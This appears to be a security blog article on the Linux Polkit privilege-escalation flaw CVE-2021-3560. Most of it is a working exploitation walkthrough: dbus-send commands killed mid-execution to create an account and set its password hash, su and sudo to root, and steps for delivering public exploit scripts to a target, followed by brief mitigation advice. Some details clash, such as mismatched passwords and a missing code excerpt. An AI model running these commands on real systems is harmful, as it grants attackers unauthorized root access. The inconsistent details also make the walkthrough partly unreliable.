CVE-2021-3560 has emerged as a significant concern for Linux-based systems. This security flaw, also known as the “Polkit” vulnerability, allows local attackers to gain root privileges, potentially leading to complete compromise of the affected system. In this article, we will delve into the details of CVE-2021-3560, its impact, and recommended measures to mitigate the risk.
What is Polkit
Polkit, also known as PolicyKit, is a framework used in Linux systems for defining and managing policies related to system privileges and access control. It provides a way to control permissions for various actions and resources, allowing non-root users to perform administrative tasks without granting them full superuser (root) privileges.
The primary purpose of Polkit is to facilitate fine-grained authorization decisions based on defined policies. It allows system administrators to specify rules and conditions for granting or denying access to privileged operations, such as system configuration changes, device management, or software installation.
Here’s a high-level overview of how Polkit works:
- Policy Definitions: Polkit relies on policy definitions that specify the desired authorization rules. These policies are usually defined in XML files located in the /etc/polkit-1/ directory. The policies describe the actions, authentication requirements, and associated privileges.
- Authentication Agents: When a user requests an action that requires elevated privileges, such as modifying system settings, a Polkit-aware application or process checks the policy associated with that action. If the policy allows the user to perform the action, an authentication agent is invoked.
- Authentication Dialog: The authentication agent presents an authentication dialog to the user, prompting for credentials, such as a password or biometric authentication. The dialog can vary depending on the desktop environment or the specific application invoking Polkit.
- Authorization Check: The entered credentials are verified against the authentication requirements specified in the policy. If the credentials are valid and meet the criteria, Polkit grants the user temporary authorization to perform the requested action with elevated privileges.
- Action Execution: With the temporary authorization, the requesting application or process can proceed to execute the action with the necessary privileges. Once the action is completed or the authorization expires, the elevated privileges are revoked.
What is dbus
dbus is a message system for applications to talk to one another (known as IPC or interprocess communication). This was developed as part of the project. A basic dbus command to list system services looks like this:
- dbus-send –system –dest=org.freedesktop.DBus –type=method_call –print-reply /org/freedesktop/DBus org.freedesktop.DBus.ListNames
dbus stores service files in /usr/share/dbus-1/system-services
- cd /usr/share/dbus-1/system-services
- ls -la
Accounts. service which triggers accounts-daemon to perform user addition/modification options.
- cat org.freedesktop.Accounts.service
Using this service file to add an user
- dbus-send –system –dest=org.freedesktop.Accounts –type=method_call –print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:vry4n string:”vry4n user” int32:1
–system: sends message to the system bus
–dest: name of the connection (interface) that receives the message
–type: method_call means a system function with arguments being passed
–print-reply: prints the output in human-readable format
/org/freedesktop/Accounts: This is the function that will be used
org.freedesktop.Accounts.CreateUser: Method that will be used. Here, create user method is used which will essentially create a new user with the name specified in string 1. String 2 is the name (“ignite user”) that will be visible in the system. int32 is an integer argument the method takes in that specifies the type of account encoded as an integer.
Overview of CVE-2021-3560:
CVE-2021-3560 is a privilege escalation vulnerability that affects the Polkit system service, which provides an authorization framework for granting privileges in Linux distributions. Polkit, also known as PolicyKit, is commonly used to handle authorization decisions, allowing non-root users to perform certain administrative tasks with the appropriate permissions.
The vulnerability resides in the Polkit’s handling of authentication credentials. A flaw in the implementation allows a local attacker with a low-privileged account to bypass the authentication process and execute arbitrary commands with elevated privileges. This could result in unauthorized access, data compromise, and potential system-wide impact.
The exact vulnerable piece of code in the provided Polkit code is located in the on_response function. Here are the lines that introduce the vulnerability:
The vulnerability lies in the polkit_agent_listener_handle_response function, which processes the response received from the Polkit authentication agent. The flaw allows an authenticated user to bypass the authentication process and execute arbitrary commands with elevated privileges.
By manipulating the response or injecting a malicious response, an attacker can exploit the race condition within the authentication process and gain unauthorized root access.
Affected Systems:
The vulnerability affects various Linux distributions that utilize Polkit versions before 0.119. This includes popular distributions like Ubuntu, Debian, Fedora, CentOS, and their derivatives. It is crucial for administrators and users of these distributions to promptly address the vulnerability to prevent potential exploitation.
polkit 0.105-26 0.117-2
polkit polkit 0.113
polkit polkit 0.118
Red Hat Enterprise Linux 8
Fedora 21 (or later)
Debian Testing (“Bullseye”)
Ubuntu 20.04 LTS (“Focal Fossa”)
1. In order to identify the version of the PolicyKit (polkit) we can run the following commands
- rpm -qa | grep -i polkit
- rpm -qa | grep -i policykit
- apt list –installed | grep -i policykit
- apt list –installed | grep -I polkit
(Optional) 2. Check these 2 services are available
- rpm -qa | grep -i accountsservice
- rpm -qa | grep -i gnome-control-center
Exploitation Scenario
To exploit CVE-2021-3560, an attacker must have a local account on the targeted Linux system. By leveraging a race condition in the Polkit’s authentication mechanism, an attacker can trick the system into granting privileged access. This is achieved by simultaneously requesting an authentication action and replacing it with a different, unauthorized action before the authentication process completes.
Upon successful exploitation, the attacker can execute commands with elevated privileges, essentially gaining root access to the system. This level of control opens the door for further malicious activities, such as installing malware, modifying system configurations, exfiltrating sensitive data, or launching additional attacks within the compromised environment.
1. For the exploit to work, we need to kill the command while it is being executed. For this we need to check the time it takes to execute this command.
- time dbus-send –system –dest=org.freedesktop.Accounts –type=method_call –print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:vry4n string:”vry4n user” int32:1
2. As you can see, it takes me 0.059 seconds to execute this command. So, I need to kill my payload before 0.059 seconds for it to work. (Run it many times, it usually doesn’t work at first, it took me like 14 times, confirm by running “cat /etc/passwd”
- dbus-send –system –dest=org.freedesktop.Accounts –type=method_call –print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:vry4n string:”vry4n user” int32:1 & sleep 0.0035s ; kill $!
- cat /etc/passwd | tail -n 5
Note: The User Vry4n has been added
3. Next, we need to supply the password using dbus so that we can use this newly created user. We need to generate a hashed password as dbus-send takes in hashed password as input.
- openssl passwd -5 vry4n@123
- Result: $5$kQUWJ.fDBUvxYaRy$XJoPnNSwyteh.YXstbXAV1l79lttePHafkIBR/KFEd9
4. Now we need to pass this hash in User.SetPassword function using dbus under a string parameter. The payload looks like, (also run this command multiple times until success), User1005 means the user ID which needs to match what is in /etc/passwd
- dbus-send –system –dest=org.freedesktop.Accounts –type=method_call –print-reply /org/freedesktop/Accounts/User1005 org.freedesktop.Accounts.User.SetPassword string:’ $5$kQUWJ.fDBUvxYaRy$XJoPnNSwyteh.YXstbXAV1l79lttePHafkIBR/KFEd9′ string:BestHackingTutorials & sleep 0.0035s ; kill $!
5. Once the User add & the Password change commands succeed, one after the other, we can proceed to log in Username: Vry4n & Password: 123456
- su vry4n
- Password: 123456
- sudo su
- Password:123456
- id
- whoami
#1 – Exploitation using a Script
1. This is a script that automates this task, first of all let’s download it, start a web server to transfer it to the target machine
- git clone
- cd CVE-2021-3560-Polkit-Privilege-Esclation
- ls
- python3 -m http.server 9999
2. Now, transfer the file into the target machine, and run it ([!] If the username is inserted, but the login fails; try running the exploit again.)
- bash
- Credentials: secnigma: secnigmaftw
#2 Exploitation using a Script
1. In this example we are going to test,, This is another bash script that can be used as an alternative. Transfer the file into the target machine and run it. (if username added to /etc/passwd and the password doesn’t work, run it several times until it succeeds)
- vi
- bash
2. Now try to switch to that user (hacked:password)
- su hacked
- Password: password
- sudo su –
- Password: password
- whoami
- id
#3 Exploitation using a Script
1. We can try this other alternative written in python (, so download it in your local machine, then start a web server to deploy it into the target machine
- git clone
- cd exploit-CVE-2021-3560
- ls
- python3 -m http.server 9999
2. Download the file from our web server, then, run the application
- wget
- python3
3. After successful execution, elevate the privileges(Username: unicord & Password: unicord), if it doesn’t work the first time, run it several times. Verify the user has been added by reading /etc/passwd file
- su unicord
- Password: unicord
- sudo su
- Password: unicord
- whoami
- id
Mitigation and Remediation:
Linux system administrators and users are strongly advised to take the following actions to mitigate the risks associated with CVE-2021-3560:
Update Polkit: Apply the latest security patches and updates provided by the respective Linux distribution. These updates typically include the patched version of Polkit, addressing the vulnerability. Keeping the system up to date is essential for maintaining a secure environment.
Monitor Security Advisories: Stay informed about security advisories and notifications from the Linux distribution’s official channels. This ensures timely awareness of vulnerabilities and recommended remediation steps.
Restrict Privileges: Implement the principle of least privilege (PoLP) by limiting user privileges to only those necessary for their tasks. Minimizing the number of accounts with administrative privileges can significantly reduce the potential impact of privilege escalation vulnerabilities.
Security Audits: Conduct regular security audits and vulnerability assessments to identify potential weaknesses and ensure that systems are adequately protected. Tools like, which performs comprehensive scans for privilege escalation vulnerabilities, can be useful in this regard.